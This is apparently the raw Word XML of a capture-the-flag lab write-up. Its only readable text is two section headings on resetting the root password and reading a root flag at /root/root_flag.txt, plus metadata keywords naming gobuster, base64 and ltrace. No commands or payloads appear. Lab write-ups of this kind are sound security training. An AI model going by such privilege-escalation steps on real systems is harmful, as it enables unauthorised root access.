    <w:p w14:paraId="0B79EE8A" w14:textId="2C250A9E" w:rsidR="0047095C" w:rsidRDefault="00145A7D" w:rsidP="00E00DB0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc145451300"/>
      <w:r>
        <w:t>Resetting Root Password</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="66975105" w14:textId="2959FA6A" w:rsidR="00145A7D" w:rsidRDefault="00F2396F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BE87E16" wp14:editId="2139FA12">
            <wp:extent cx="4972050" cy="847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A8B" w14:textId="416005B0" w:rsidR="007B1D6E" w:rsidRDefault="00F2396F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7D144A8A" wp14:editId="00D719B6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>203556</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="16287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74" y="20880"/>
                <wp:lineTo x="2147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I can switch user to the root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F58AAD0" w14:textId="279DB605" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="685CAA17" w14:textId="45F6311C" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="10C6E993" w14:textId="39FB5D2E" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="7B329110" w14:textId="5DF40D78" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="76B59BC4" w14:textId="3025B2FA" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="314FF591" w14:textId="638C7FDC" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="20120001" w14:textId="2FAC4BF4" w:rsidR="007B1D6E" w:rsidRDefault="006E0276" w:rsidP="00CF04C2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc145451301"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Root Flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="7FEA9B77" w14:textId="6B241289" w:rsidR="006E0276" w:rsidRDefault="00EF5F9A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61E7F4E6" wp14:editId="1AAB0163">
            <wp:extent cx="5610225" cy="4686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BC94" w14:textId="28D6F671" w:rsidR="007B1D6E" w:rsidRDefault="00EF5F9A">
      <w:r>
        <w:t>The final flag is located under the root directory (“/root/root_flag.txt”).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C98A81E" w14:textId="77765F63" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="133646AA" w14:textId="2441983D" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="037A23A5" w14:textId="7FB62F5A" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="0B439BAA" w14:textId="3BB787EC" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="0AE6474C" w14:textId="3F49EAED" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="11C66868" w14:textId="03A01D40" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="308ECDF5" w14:textId="71800233" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="56E14255" w14:textId="1ABA8E9F" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="01FE3824" w14:textId="10BC7068" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="28310985" w14:textId="7C470596" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="0F482286" w14:textId="77777777" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:sectPr w:rsidR="007B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6F"/>
    <w:rsid w:val="00013CFB"/>
    <w:rsid w:val="00020FEE"/>
    <w:rsid w:val="00043BDD"/>
    <w:rsid w:val="0004626A"/>
    <w:rsid w:val="000B3B4D"/>
    <w:rsid w:val="000B4A61"/>
    <w:rsid w:val="000E5D71"/>
    <w:rsid w:val="00106933"/>
    <w:rsid w:val="00115BCC"/>
    <w:rsid w:val="0013666B"/>
    <w:rsid w:val="0014157F"/>
    <w:rsid w:val="00145A7D"/>
    <w:rsid w:val="00187F47"/>
    <w:rsid w:val="001C3628"/>
    <w:rsid w:val="001C684E"/>
    <w:rsid w:val="001E6CCB"/>
    <w:rsid w:val="002011D1"/>
    <w:rsid w:val="00207496"/>
    <w:rsid w:val="0022095C"/>
    <w:rsid w:val="00260ECD"/>
    <w:rsid w:val="00264CAC"/>
    <w:rsid w:val="002734D1"/>
    <w:rsid w:val="002F1350"/>
    <w:rsid w:val="003200E7"/>
    <w:rsid w:val="003438F2"/>
    <w:rsid w:val="0039001C"/>
    <w:rsid w:val="00392B79"/>
    <w:rsid w:val="003E4892"/>
    <w:rsid w:val="00401C06"/>
    <w:rsid w:val="004022D9"/>
    <w:rsid w:val="00405576"/>
    <w:rsid w:val="004103F6"/>
    <w:rsid w:val="00427B5D"/>
    <w:rsid w:val="00433A33"/>
    <w:rsid w:val="00456EC0"/>
    <w:rsid w:val="00457560"/>
    <w:rsid w:val="0047095C"/>
    <w:rsid w:val="004A6679"/>
    <w:rsid w:val="004D140B"/>
    <w:rsid w:val="004F2C75"/>
    <w:rsid w:val="005029A3"/>
    <w:rsid w:val="00531A62"/>
    <w:rsid w:val="005C4D32"/>
    <w:rsid w:val="005D72C5"/>
    <w:rsid w:val="005F055A"/>
    <w:rsid w:val="00680EB7"/>
    <w:rsid w:val="006939DB"/>
    <w:rsid w:val="006A3D1E"/>
    <w:rsid w:val="006A401B"/>
    <w:rsid w:val="006C3BAE"/>
    <w:rsid w:val="006E0276"/>
    <w:rsid w:val="00700F85"/>
    <w:rsid w:val="00704E84"/>
    <w:rsid w:val="00706444"/>
    <w:rsid w:val="007444B1"/>
    <w:rsid w:val="00752822"/>
    <w:rsid w:val="00785EA2"/>
    <w:rsid w:val="00796F79"/>
    <w:rsid w:val="007A518A"/>
    <w:rsid w:val="007B1CD3"/>
    <w:rsid w:val="007B1D6E"/>
    <w:rsid w:val="007B5F50"/>
    <w:rsid w:val="007C44CF"/>
    <w:rsid w:val="007D4AE1"/>
    <w:rsid w:val="008152B9"/>
    <w:rsid w:val="00823427"/>
    <w:rsid w:val="00825238"/>
    <w:rsid w:val="00852419"/>
    <w:rsid w:val="0088554F"/>
    <w:rsid w:val="008F63F1"/>
    <w:rsid w:val="00925430"/>
    <w:rsid w:val="00946E58"/>
    <w:rsid w:val="00955900"/>
    <w:rsid w:val="00962FF6"/>
    <w:rsid w:val="00970FB4"/>
    <w:rsid w:val="00A121B2"/>
    <w:rsid w:val="00A30E8A"/>
    <w:rsid w:val="00A32628"/>
    <w:rsid w:val="00A35555"/>
    <w:rsid w:val="00A42ABF"/>
    <w:rsid w:val="00A47823"/>
    <w:rsid w:val="00A60F2D"/>
    <w:rsid w:val="00A74DDA"/>
    <w:rsid w:val="00A778F4"/>
    <w:rsid w:val="00A90792"/>
    <w:rsid w:val="00AA4FC7"/>
    <w:rsid w:val="00AA6BDC"/>
    <w:rsid w:val="00B026DF"/>
    <w:rsid w:val="00B34C5B"/>
    <w:rsid w:val="00B630B0"/>
    <w:rsid w:val="00BB0C94"/>
    <w:rsid w:val="00BD4D89"/>
    <w:rsid w:val="00BD68E2"/>
    <w:rsid w:val="00BE0A46"/>
    <w:rsid w:val="00C01AFA"/>
    <w:rsid w:val="00C55B00"/>
    <w:rsid w:val="00CF04C2"/>
    <w:rsid w:val="00D07D33"/>
    <w:rsid w:val="00D100F7"/>
    <w:rsid w:val="00D42287"/>
    <w:rsid w:val="00D4406F"/>
    <w:rsid w:val="00D678B3"/>
    <w:rsid w:val="00D823F8"/>
    <w:rsid w:val="00D92D18"/>
    <w:rsid w:val="00DA0F30"/>
    <w:rsid w:val="00DC00B4"/>
    <w:rsid w:val="00E00DB0"/>
    <w:rsid w:val="00E42746"/>
    <w:rsid w:val="00E42E7B"/>
    <w:rsid w:val="00E51EC2"/>
    <w:rsid w:val="00E558DE"/>
    <w:rsid w:val="00EA5CED"/>
    <w:rsid w:val="00EF5F9A"/>
    <w:rsid w:val="00F07BAF"/>
    <w:rsid w:val="00F2396F"/>
    <w:rsid w:val="00F520A5"/>
    <w:rsid w:val="00F545B1"/>
    <w:rsid w:val="00F57618"/>
    <w:rsid w:val="00F86162"/>
    <w:rsid w:val="00F96610"/>
    <w:rsid w:val="00FA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2C10"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ECE297BE-2398-4D8E-89E6-0E472998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26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966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6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3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36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80E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0EB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0E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192.168.56.101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7A55-F944-41A6-B583-6E10ABAB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SL certificate; gobuster; cyberchef; base64; ltrace</cp:keywords>
  <dc:description/>
  <cp:lastModifiedBy>Michael Vasilio</cp:lastModifiedBy>
  <cp:revision>145</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-07T07:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-12T14:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>